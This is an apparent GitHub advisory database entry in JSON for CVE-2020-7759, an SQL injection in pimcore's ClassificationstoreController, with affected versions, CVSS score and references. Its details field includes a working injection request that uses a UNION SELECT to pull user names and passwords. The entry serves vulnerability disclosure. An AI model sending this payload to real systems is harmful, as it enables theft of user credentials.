{"id":"GHSA-8jmh-c6vr-pmvm","summary":"SQL Injection in pimcore","details":"\"The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{\"keyId\"%3a\"''\",\"groupId\"%3a\"'asd'))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,'',11,12,'',14+from+users)+--+\"}]\"","aliases":["CVE-2020-7759","SNYK-PHP-PIMCOREPIMCORE-1017405"],"modified":"2026-07-08T06:50:04.133076813Z","published":"2021-05-06T18:53:55Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2021-04-20T17:18:14Z","nvd_published_at":"2020-10-30T11:15:00Z","cwe_ids":["CWE-89"]},"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-7759"},{"type":"WEB","url":"https://github.com/pimcore/pimcore/pull/7315"},{"type":"WEB","url":"https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1017405"}],"affected":[{"package":{"name":"pimcore/pimcore","ecosystem":"Packagist","purl":"pkg:composer/pimcore/pimcore"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"6.7.2"},{"fixed":"6.8.3"}]}],"versions":["v6.7.2","v6.7.3","v6.8.0","v6.8.1","v6.8.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-8jmh-c6vr-pmvm/GHSA-8jmh-c6vr-pmvm.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}]}